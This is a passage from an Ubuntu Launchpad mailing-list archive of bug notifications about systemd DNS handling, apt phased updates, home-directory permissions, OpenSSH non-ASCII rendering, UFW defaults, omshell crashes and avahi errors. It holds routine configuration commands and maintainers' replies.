root=UUID=c83ab0ab-bcc6-4f8e-a43f-c872be521021 ro quiet splash vt.handoff=7 SourcePackage: xorg Symptom: display UpgradeStatus: Upgraded to jammy on 2022-08-11 (10 days ago) dmi.bios.date: 02/13/2018 dmi.bios.release: 15.103 dmi.bios.vendor: Hewlett-Packard dmi.bios.version: 68SCF Ver. F.67 dmi.board.name: 161C dmi.board.vendor: Hewlett-Packard dmi.board.version: KBC Version 97.4E dmi.chassis.asset.tag: CZC23633JQ dmi.chassis.type: 10 dmi.chassis.vendor: Hewlett-Packard dmi.ec.firmware.release: 151.78 dmi.modalias: dmi:bvnHewlett-Packard:bvr68SCFVer.F.67:bd02/13/2018:br15.103:efr151.78:svnHewlett-Packard:pnHPEliteBook8460p:pvrA0001D02:rvnHewlett-Packard:rn161C:rvrKBCVersion97.4E:cvnHewlett-Packard:ct10:cvr:skuSN246UP#ABF: dmi.product.family: 103C_5336AN dmi.product.name: HP EliteBook 8460p dmi.product.sku: SN246UP#ABF dmi.product.version: A0001D02 dmi.sys.vendor: Hewlett-Packard version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.110-1ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 22.0.5-0ubuntu0.1 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2.1 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2ubuntu1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-shell/+bug/1987228/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1988010] Re: systemd ignoring DHCP DNS servers and DNS servers set in Network Manager GUI
Hello Josh, which GUI are you using to change dns or dhcp settings? Thanks ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1988010 Title: systemd ignoring DHCP DNS servers and DNS servers set in Network Manager GUI Status in systemd package in Ubuntu: New Bug description: Hi there! I'm running ubuntu 22.04.1 LTS installed via the ISO image ubuntu-22.04.1-desktop-amd64.iso. This issue affects both the Live CD and installed operating system. I have configured my modem's DHCP server to push my adguard home DNS server (cloud-hosted) as the DNS for the network. I have an access point that is setup to do the same. With the Live CD and installed operating system, there is a local DNS server installed that runs on 127.0.0.1:53. Somehow this bypasses the DNS servers I've configured for the network and suddenly websites that have been blocked for being malicious or harmful are now accessible. There is no option in the installer or GUI to disable this. Changing the network DNS settings via the GUI of either the live cd or installation do not change the behavior and do not result in the specified DNS server(s) being used. The 127.0.0.1:53 server still overrides anything set in the GUI. The only way I have found to override this behavior is to edit /etc/systemd/resolved.conf: 1) uncomment DNSStubListener=yes 2) change yes to no 3) save file 4) run the following commands in terminal: sudo systemctl daemon-reload sudo systemctl restart systemd-networkd sudo systemctl restart systemd-resolved After doing so, the DNS servers that have been provided by DHCP are properly used. This is considered a security vulnerability due to there being no way for a normal user to change this setting without editing system configuration files and no warning given to the user that the settings they are applying in the GUI have not been applied due to this default configuration. This is considered a hack if this is the intentional configuration as it overrides network configuration options set by the DHCP server. I've resolved it for myself for now by making a custom iso image that removes this configuration by default and instead installs the /etc/systemd/resolved.conf file attached to this bug report. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: systemd 249.11-0ubuntu3.4 ProcVersionSignature: Ubuntu 5.15.0-46.49-generic 5.15.39 Uname: Linux 5.15.0-46-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Sun Aug 28 21:18:35 2022 InstallationDate: Installed on 2022-08-29 (0 days ago) InstallationMedia: Ubuntu 22.04.1 2022.08.28 LTS "Custom Jammy Jellyfish" (20220828) MachineType: Micro-Star International Co., Ltd. GS75 Stealth 9SG ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-46-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: systemd UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 03/26/2019 dmi.bios.release: 1.12 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: E17G1IMS.10C dmi.board.asset.tag: Default string dmi.board.name: MS-17G1 dmi.board.vendor: Micro-Star International Co., Ltd. dmi.board.version: REV:1.0 dmi.chassis.asset.tag: No Asset Tag dmi.chassis.type: 10 dmi.chassis.vendor: Micro-Star International Co., Ltd. dmi.chassis.version: N/A dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvrE17G1IMS.10C:bd03/26/2019:br1.12:svnMicro-StarInternationalCo.,Ltd.:pnGS75Stealth9SG:pvrREV1.0:rvnMicro-StarInternationalCo.,Ltd.:rnMS-17G1:rvrREV1.0:cvnMicro-StarInternationalCo.,Ltd.:ct10:cvrN/A:sku17G1.1: dmi.product.family: GS dmi.product.name: GS75 Stealth 9SG dmi.product.sku: 17G1.1 dmi.product.version: REV:1.0 dmi.sys.vendor: Micro-Star International Co., Ltd. mtime.conffile..etc.systemd.resolved.conf: 2022-08-28T19:29:41 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988010/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1988010] Re: systemd ignoring DHCP DNS servers and DNS servers set in Network Manager GUI
Cool, thanks Josh -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to systemd in Ubuntu. https://bugs.launchpad.net/bugs/1988010 Title: systemd ignoring DHCP DNS servers and DNS servers set in Network Manager GUI Status in systemd package in Ubuntu: New Bug description: Hi there! I'm running ubuntu 22.04.1 LTS installed via the ISO image ubuntu-22.04.1-desktop-amd64.iso. This issue affects both the Live CD and installed operating system. I have configured my modem's DHCP server to push my adguard home DNS server (cloud-hosted) as the DNS for the network. I have an access point that is setup to do the same. With the Live CD and installed operating system, there is a local DNS server installed that runs on 127.0.0.1:53. Somehow this bypasses the DNS servers I've configured for the network and suddenly websites that have been blocked for being malicious or harmful are now accessible. There is no option in the installer or GUI to disable this. Changing the network DNS settings via the GUI of either the live cd or installation do not change the behavior and do not result in the specified DNS server(s) being used. The 127.0.0.1:53 server still overrides anything set in the GUI. The only way I have found to override this behavior is to edit /etc/systemd/resolved.conf: 1) uncomment DNSStubListener=yes 2) change yes to no 3) save file 4) run the following commands in terminal: sudo systemctl daemon-reload sudo systemctl restart systemd-networkd sudo systemctl restart systemd-resolved After doing so, the DNS servers that have been provided by DHCP are properly used. This is considered a security vulnerability due to there being no way for a normal user to change this setting without editing system configuration files and no warning given to the user that the settings they are applying in the GUI have not been applied due to this default configuration. This is considered a hack if this is the intentional configuration as it overrides network configuration options set by the DHCP server. I've resolved it for myself for now by making a custom iso image that removes this configuration by default and instead installs the /etc/systemd/resolved.conf file attached to this bug report. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: systemd 249.11-0ubuntu3.4 ProcVersionSignature: Ubuntu 5.15.0-46.49-generic 5.15.39 Uname: Linux 5.15.0-46-generic x86_64 NonfreeKernelModules: nvidia_modeset nvidia ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: ubuntu:GNOME Date: Sun Aug 28 21:18:35 2022 InstallationDate: Installed on 2022-08-29 (0 days ago) InstallationMedia: Ubuntu 22.04.1 2022.08.28 LTS "Custom Jammy Jellyfish" (20220828) MachineType: Micro-Star International Co., Ltd. GS75 Stealth 9SG ProcEnviron: PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-5.15.0-46-generic root=/dev/mapper/vgubuntu-root ro quiet splash vt.handoff=7 SourcePackage: systemd UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 03/26/2019 dmi.bios.release: 1.12 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: E17G1IMS.10C dmi.board.asset.tag: Default string dmi.board.name: MS-17G1 dmi.board.vendor: Micro-Star International Co., Ltd. dmi.board.version: REV:1.0 dmi.chassis.asset.tag: No Asset Tag dmi.chassis.type: 10 dmi.chassis.vendor: Micro-Star International Co., Ltd. dmi.chassis.version: N/A dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvrE17G1IMS.10C:bd03/26/2019:br1.12:svnMicro-StarInternationalCo.,Ltd.:pnGS75Stealth9SG:pvrREV1.0:rvnMicro-StarInternationalCo.,Ltd.:rnMS-17G1:rvrREV1.0:cvnMicro-StarInternationalCo.,Ltd.:ct10:cvrN/A:sku17G1.1: dmi.product.family: GS dmi.product.name: GS75 Stealth 9SG dmi.product.sku: 17G1.1 dmi.product.version: REV:1.0 dmi.sys.vendor: Micro-Star International Co., Ltd. mtime.conffile..etc.systemd.resolved.conf: 2022-08-28T19:29:41 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988010/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1988588] Re: Xeon E3-1200 v2/3rd Gen Core processor Graphics Controller Drivers missing
** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to xorg in Ubuntu. https://bugs.launchpad.net/bugs/1988588 Title: Xeon E3-1200 v2/3rd Gen Core processor Graphics Controller Drivers missing Status in xorg package in Ubuntu: New Bug description: Please upgrade the Ubuntu OS and provide Graphics drivers for Ubuntu 22. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: xorg 1:7.7+23ubuntu2 ProcVersionSignature: Ubuntu 5.15.0-47.51-generic 5.15.46 Uname: Linux 5.15.0-47-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 BootLog: Error: [Errno 13] Permission denied: '/var/log/boot.log' CasperMD5CheckResult: pass CompositorRunning: None CurrentDesktop: ubuntu:GNOME Date: Fri Sep 2 20:59:09 2022 DistUpgraded: Fresh install DistroCodename: jammy DistroVariant: ubuntu ExtraDebuggingInterest: Yes, including running git bisection searches GraphicsCard: Intel Corporation Xeon E3-1200 v2/3rd Gen Core processor Graphics Controller [8086:0152] (rev 09) (prog-if 00 [VGA controller]) Subsystem: Intel Corporation Xeon E3-1200 v2/3rd Gen Core processor Graphics Controller [8086:204d] InstallationDate: Installed on 2022-09-02 (0 days ago) InstallationMedia: Ubuntu 22.04.1 LTS "Jammy Jellyfish" - Release amd64 (20220809.1) ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.15.0-47-generic root=UUID=85140ee7-0511-45cd-aa7c-903f11fd90d1 ro quiet splash SourcePackage: xorg UpgradeStatus: No upgrade log present (probably fresh install) dmi.bios.date: 09/07/2012 dmi.bios.release: 4.6 dmi.bios.vendor: Intel Corp. dmi.bios.version: MLZ7510H.86A.0006.2012.0907.1307 dmi.board.name: DZ75ML-45K dmi.board.vendor: Intel Corporation dmi.board.version: AAG75008-102 dmi.chassis.type: 3 dmi.modalias: dmi:bvnIntelCorp.:bvrMLZ7510H.86A.0006.2012.0907.1307:bd09/07/2012:br4.6:svn:pn:pvr:rvnIntelCorporation:rnDZ75ML-45K:rvrAAG75008-102:cvn:ct3:cvr:skuTobefilledbyO.E.M.: dmi.product.family: To be filled by O.E.M. dmi.product.sku: To be filled by O.E.M. version.compiz: compiz N/A version.libdrm2: libdrm2 2.4.110.5+1038 version.libgl1-mesa-dri: libgl1-mesa-dri 22.0.5-0ubuntu0.1 version.libgl1-mesa-glx: libgl1-mesa-glx N/A version.xserver-xorg-core: xserver-xorg-core 2:21.1.3-2ubuntu2.1 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev N/A version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:19.1.0-2ubuntu1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20210115-1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.17-2build1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1988588/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1988819] Re: When apt keeps back packages due to phased updates, it should say so
I have seen many people on IRC *very* upset after wasting a lot of time trying to install updates that apt will not let them install. Fixing this is critical to our reputation. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/1988819 Title: When apt keeps back packages due to phased updates, it should say so Status in apt package in Ubuntu: New Bug description: After phased updates have been introduced, it may happen that apt upgrade shows packages as upgradable but ends up not upgrading them. In this case the packages are indicated as being "kept back". Unfortunately, the feedback provided about this to the user is not very informative. The user sees the packages being kept back and thinks something is going wrong on the system. When packages are kept back because of phased updates, apt should say so e.g., it should say that the upgrade is delayed. Incidentally note that aptitude does not respect phased updates. ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: apt 2.4.7 ProcVersionSignature: Ubuntu 5.15.0-47.51-generic 5.15.46 Uname: Linux 5.15.0-47-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.1 Architecture: amd64 CasperMD5CheckResult: unknown CurrentDesktop: KDE Date: Tue Sep 6 10:05:14 2022 EcryptfsInUse: Yes InstallationDate: Installed on 2020-02-16 (933 days ago) InstallationMedia: Kubuntu 19.10 "Eoan Ermine" - Release amd64 (20191017) SourcePackage: apt UpgradeStatus: Upgraded to jammy on 2022-06-03 (94 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1988819/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 48734] Re: Home permissions too open
On Mon, Sep 12, 2022 at 07:39:37AM -, Alkis Georgopoulos wrote:
> This change takes away the ability of the users to share some of their
> data WITHOUT involving the administrator.
Hello Alkis, do note that it is typical for users to own their own home
directory; if a user wishes to share, they can run:
chmod 755 ~
or
chmod 751 ~
(The choice is based on whether they want to allow listing their home
directory or not.)
Of course, they'd be wise to inspect the permissions on their other
files and directories to make sure they're only sharing what they intend
to share.
Of course, if the local administrator has decided that users cannot own
their own home directories, then that's another question entirely, one
you'll need to take up with the local administrator.
Thanks
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to adduser in Ubuntu.
https://bugs.launchpad.net/bugs/48734
Title:
Home permissions too open
Status in adduser package in Ubuntu:
Fix Released
Status in shadow package in Ubuntu:
Fix Released
Status in adduser source package in Hirsute:
Fix Released
Status in shadow source package in Hirsute:
Fix Released
Status in Ubuntu RTM:
Opinion
Bug description:
Binary package hint: debian-installer
On a fresh dapper install i noticed that the file permissons for the
home directory for the user created by the installer is set to 755,
giving read access to everyone on the system.
Surely this is a bad idea? If your set on the idea can we atleast have
a option during the boot proccess?
Also new files that are created via the console ('touch' etc.) are
done so with '644' permissons, is there anything that can be done
here? nautlius seems to create files at '600', which is a better
setting.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/48734/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2062667] Re: Fails on (and should be removed from) raspi desktop
I'm having trouble seeing what the consequences are: > the result is a permanently failed service vs > this is was a major annoyance on my m2 air after upgrading to noble Was it it more than a red line in systemctl status output? Does it have annoying logging behaviour or break some other service if it isn't running? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ubuntu-meta in Ubuntu. https://bugs.launchpad.net/bugs/2062667 Title: Fails on (and should be removed from) raspi desktop Status in protection-domain-mapper package in Ubuntu: Confirmed Status in qrtr package in Ubuntu: Confirmed Status in ubuntu-meta package in Ubuntu: Confirmed Bug description: The protection-domain-mapper package (and qrtr-tools) are both installed by default on the Ubuntu Desktop for Raspberry Pi images, thanks to their inclusion in the desktop-minimal seed for arm64. However, there's no hardware that they target on these platforms, and the result is a permanently failed service (pd-mapper.service). It appears these were added to support the X13s laptop [1]. I've attempted to work around the issue by excluding these packages in the desktop-raspi seed (experimentally in my no-pd-mapper branch [2]) but this does not work (the packages still appear in the built images). Ideally, these packages should be moved into a hardware-specific seed for the X13s (and/or whatever other laptops need these things). Alternatively, at a bare minimum, the package should have some conditional that causes the service not to attempt to start when it's not on Qualcomm hardware. [1]: https://git.launchpad.net/~ubuntu-core-dev/ubuntu- seeds/+git/ubuntu/commit/desktop- minimal?id=afe820cd49514896e96d02303298ed873d8d7f8a [2]: https://git.launchpad.net/~waveform/ubuntu- seeds/+git/ubuntu/commit/?id=875bddac19675f7e971f56d9c5d39a9912dc6e38 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/protection-domain-mapper/+bug/2062667/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2077576] Re: SSH client doesn't handle properly non-ASCII chars
This change makes me uneasy: - I see no terminal-aware filtering applied in the notify_start() -> xvasprintf() -> writemsg() -> write() path. The remote server may not be entirely untrusted but it's also not exactly trusted, either, especially on the first use. There's a long and glorious history of surprising outcomes due to terminal escape sequences https://www.cyberark.com/resources/threat-research-blog/dont-trust-this- title-abusing-terminal-emulators-with-ansi-escape-characters - I'm not sure it's even necessary: my phone was easily able to read pure-ascii QR codes as easily as the (admittedly much better looking) utf-8 based codes. Try a few: sudo apt install qrencode u=`cat /proc/sys/kernel/random/uuid` ; for t in ANSI ANSI256 ASCII ASCIIi UTF8 ANSIUTF8 ; do qrencode -t $t $u ; done ; echo $u ; unset u Are ascii-encoded qr codes known to be insufficient? - As for the actual code changes, they seemed fairly straightforward, and I found no issues. I'm very wary about undoing a safety mechanism from the past, put in place by people who thought about this significantly more than I have. - Upstream might have been engaging for a while but now appears entirely silent. This reminds me too much of dpkg+zstd, where a similar train of engagement lead to Ubuntu forking the dpkg ecosystem and carrying a patch without a clear way to reunify the ecosystem. Will we do the same to OpenSSH? (We might have already passed this point if we chose to ship this in Noble rather than wait for Oracular to test this out.) Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssh in Ubuntu. https://bugs.launchpad.net/bugs/2077576 Title: SSH client doesn't handle properly non-ASCII chars Status in openssh package in Ubuntu: Fix Released Status in openssh source package in Focal: Incomplete Status in openssh source package in Jammy: Incomplete Status in openssh source package in Noble: Fix Released Bug description: [ Impact ] Non-ascii visible chars (including back-slashes, new lines and so) are not properly rendered by clients, showing their octal visualization. Such as: Hello SSHD \\ We love \360\237\215\225! Instead of: Hello SSHD \ We love 🍕! This is particularly an issue when a server has configured keyboard interactive authentication and a PAM module wants to show non-ASCII characters such as a QR code for web authentication: When using an ubuntu server running authd for web authentication we may end up having the login qrcode rendered such as \210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210\342\226\210 https://ubuntu.com 1337 Which is clearly unreadable. [ Test case ] ## Server preparation Enable PAM and keyboard interactive authentication in a ssh server: Add a configuration file such as: /etc/ssh/sshd_config.d/test-ssh-pam.conf Containing: UsePAM yes KbdInteractiveAuthentication yes # This was working already; here to check potential regressions ForceCommand bash -c "echo Hello from SSHD \ We also love 🍕!; $SHELL" It's also suggested to check for regressions using a `Banner` option in sshd, pointing to a file with utf-8 contents. Restart the server: sudo systemctl restart ssh.service Edit the sshd PAM configuration file, adding as first line: authrequisite pam_echo.so Hello SSHD \ We love 🍕! Can be done with the command: sudo sed '1 iauthrequisite pam_echo.so Hello SSHD! \\ We love 🍕!' \ -i /etc/pam.d/sshd ## Client test In the same host: ssh -o PubkeyAuthentication=no \ -o PasswordAuthentication=no \ -o PreferredAuthentications=keyboard-interactive \ $USER@localhost The client should show: Hello SSHD \ We love 🍕! ($USER@localhost) Password: ... Hello from SSHD \ We also love 🍕! Retry the same with another host and without keyboard authentication enabled in the server side. To verify the fix in more complex scenario it's possible to follow the instructions of configuring authd: - https://github.com/ubuntu/authd/wiki/05--How%E2%80%90to-log-in-over-SSH Once authd is configured, the user should be able to scan a QrCode from a ssh session. ## Cleanup Revert the changes done in the cleanup phase, after test is done sudo sed '/pam_echo\.so/d' -i /etc/pam.d/sshd sudo rm /etc/ssh/sshd_config.d/test-ssh-pam.conf [ Regression potential ] SSH info messages are not shown by the client. Even though those aren't covered by this change, it's important to check for regressions in an
[Touch-packages] [Bug 1999155] Re: UFW Disabled by default
Hello Pedro, thanks for the report; this was an explicit decision: https://wiki.ubuntu.com/SecurityTeam/FAQ#UFW Making firewall rules that are tight enough to stop threats yet open enough for the computer to still be useful in a wide variety of environments is very challenging. We've decided that it's better for the tools to be available but not try to provide a default configuration. Thanks ** Information type changed from Private Security to Public Security ** Changed in: ufw (Ubuntu) Status: New => Opinion -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ufw in Ubuntu. https://bugs.launchpad.net/bugs/1999155 Title: UFW Disabled by default Status in ufw package in Ubuntu: Opinion Bug description: UFW or iptables is disabled by default on both ubuntu server and desktop, which poses a major security risk as ports that shouldn't be open, are open by default, specially for incoming connections. If UFW breaks working apps on Ubuntu server and desktop, at least make it enabled by default but reject all incoming connections. Malware and exploits are out in the open, and no one in their sane mind would a Firewall suit disabled on Linux or Windows. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/ufw/+bug/1999155/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1916931] Re: omshell returns inconsistent results or segfaults
Bill, Lukas asked a question in comment #10 and set the bug to 'incomplete', hoping to get feedback from someone who could reproduce the problem. If you can provide an answer, please do set the bug back to 'confirmed' when answering. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to isc-dhcp in Ubuntu. https://bugs.launchpad.net/bugs/1916931 Title: omshell returns inconsistent results or segfaults Status in isc-dhcp package in Ubuntu: Expired Bug description: I have just built a Ubuntu 20.04 server and installed isc-dhcp-server 4.4.1 on it and I am seeing inconsistent returns from omshell. Initially omshell returns data as expected, but when I exit and re-enter omshell connections fail. Here is the initial, working, session: # omshell > server localhost > port 7911 > key omapi_key > connect obj: > new failover-state obj: failover-state > set name = "dhcp-failover" obj: failover-state name = "dhcp-failover" > open obj: failover-state name = "dhcp-failover" partner-address = c0:9d:e9:76:e9:55:00:00 partner-port = 00:00:02:07 local-address = 10:9d:e9:76:e9:55:00:00 local-port = 00:00:02:07 max-outstanding-updates = 00:00:00:0a mclt = 00:00:01:2c load-balance-max-secs = 00:00:00:03 load-balance-hba = ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 partner-state = 00:00:00:02 local-state = 00:00:00:02 partner-stos = 60:36:d0:68 local-stos = 60:36:8b:3b hierarchy = 00:00:00:01 last-packet-sent = 00:00:00:00 last-timestamp-received = 00:00:00:00 skew = 00:00:00:00 max-response-delay = 00:00:00:3c cur-unacked-updates = 00:00:00:00 Here is what I see when the connect fails. Well, just hangs really. # omshell > server localhost > port 7911 > key omapi_key > connect And then I hit ctrl-c to break out and tried again: # omshell > server localhost > port 7911 > key omapi_key > connect Segmentation fault (core dumped) Note, the peer to this server is still running Ubuntu 18.04 with isc-dhcp-server 4.3.5. Running the exact same commands on the peer works reliably. (They are using the same python script to drive omshell.) The DHCP server on the new system appears to be working just fine as reported by omshell on the peer and systemctl. I was curious if the problem could be with the mis-matched versions of isc-dhcp-server so I shutdown isc-dhcp-server on the 18.04 system and get the same results. I also tried using a python script with the pypureomapi module to try and determine if the problem was in omshell or the server. I got very similar results when I attempted to get information about the failover state of the server. Interestingly interrogating the server about host information seems to work just fine. This is a critical bug since I don't see how to fail over a DHCP that is running the isc-dhcp-server on 20.04 without being able to issue omapi commands. I am attaching apport output to this bug report. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/isc-dhcp/+bug/1916931/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2002891] Re: avahi_service_browser_new() failed: Invalid service type
** Information type changed from Private Security to Public -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to avahi in Ubuntu. https://bugs.launchpad.net/bugs/2002891 Title: avahi_service_browser_new() failed: Invalid service type Status in avahi package in Ubuntu: New Bug description: Hi, on a network, where the router offers DHCP, but does not put the DHCP clients in a DNS domain, thus where it is necessary to use mdns/avahi instead, I ran into several problems with avahi. One is avahi-browse -a -t avahi_service_browser_new() failed: Invalid service type No other output. i.e. it just does not work. In this network, all Ubuntu machines show this behaviour. In my other network (with working DHCP-DNS, different router, different brand, therefore not depending on mdns) the problem does not occur Since the debugging output of avahi software is – if at all – very poor, I cannot see what causes this problem. However, dbus-monitor --system showed ... method call time=1673742811.321042 sender=:1.692 -> destination=org.freedesktop.Avahi serial=10 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew int32 -1 int32 -1 string "_ipp._tcp" string "local" uint32 0 method return time=1673742811.321093 sender=:1.479 -> destination=:1.692 serial=557 reply_serial=10 object path "/Client29/ServiceBrowser3" method call time=1673742811.321259 sender=:1.692 -> destination=org.freedesktop.Avahi serial=11 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew int32 -1 int32 -1 string "_scanner._tcp" string "local" uint32 0 method return time=1673742811.321301 sender=:1.479 -> destination=:1.692 serial=558 reply_serial=11 object path "/Client29/ServiceBrowser4" method call time=1673742811.321391 sender=:1.692 -> destination=org.freedesktop.Avahi serial=12 path=/; interface=org.freedesktop.Avahi.Server; member=ServiceBrowserNew int32 -1 int32 -1 string "" string "" uint32 0 error time=1673742811.321479 sender=:1.479 -> destination=:1.692 error_name=org.freedesktop.Avahi.InvalidServiceTypeError reply_serial=12 string "Invalid service type" So it seems as if the client (browser) queries one services after the other, which works, but then an empty string as a name, which is rejected by the daemon, which then makes the client to spit out this error message and then terminate immediately. Since I have similar (i.e. very similar, both created with puppet) machines, and all machines in one network fail, while similar machines in another don't, I guess that the problem is caused by some network reply, maybe a printer. This, however, could be a security problem, because if someone can cause avahi and thus mdns resolution to fail in networks like this here, where the router and dhcp server does not offer the host names in a DNS domain (Huawei glass fiber router), a malformed packet could cause the mdns resolution of avahi to fail and therefore could be used for an attack, effectively blocking certain kinds of mdns service resolution. But since I have not yet understood what really causes this problem, it is just an assumption. regards ProblemType: Bug DistroRelease: Ubuntu 22.04 Package: avahi-utils 0.8-5ubuntu5 ProcVersionSignature: Ubuntu 5.15.0-58.64-generic 5.15.74 Uname: Linux 5.15.0-58-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu82.3 Architecture: amd64 CasperMD5CheckResult: pass CurrentDesktop: XFCE Date: Sun Jan 15 02:35:24 2023 InstallationDate: Installed on 2022-12-25 (20 days ago) InstallationMedia: Xubuntu 22.04.1 LTS "Jammy Jellyfish" - Release amd64 (20220809.1) SourcePackage: avahi UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/avahi/+bug/2002891/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2002891] Re: avahi_service_browser_new() failed: Invalid service type
Hello Hadmut, my first inclination is that this isn't a security issue: - services should use cryptographic verification of both peers, if this is important - network administrators can use port security settings on their equipment to restrict which hosts can communicate in which fashions If I've overlooked something, please do let us know. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to avahi in Ubuntu. https://bugs.launchpad.net/bugs/2002891 Title: avahi_service_browser_new() failed: Invalid service type Status in avahi package in Ubuntu: New Bug description: Hi, on a network, where the router offers DHCP, but does not put the DHCP clients in a DNS domain, thus where it is necessary to use mdns/avahi instead, I ran into several problems with avahi. One is avahi-browse -a -t avahi_service_browser_new() failed: Invalid service type No other output. i.e. it just does not work. In this network, all Ubuntu machines show this behaviour. In my other network (with working DHCP-DNS, different router, different brand, therefore not depending on 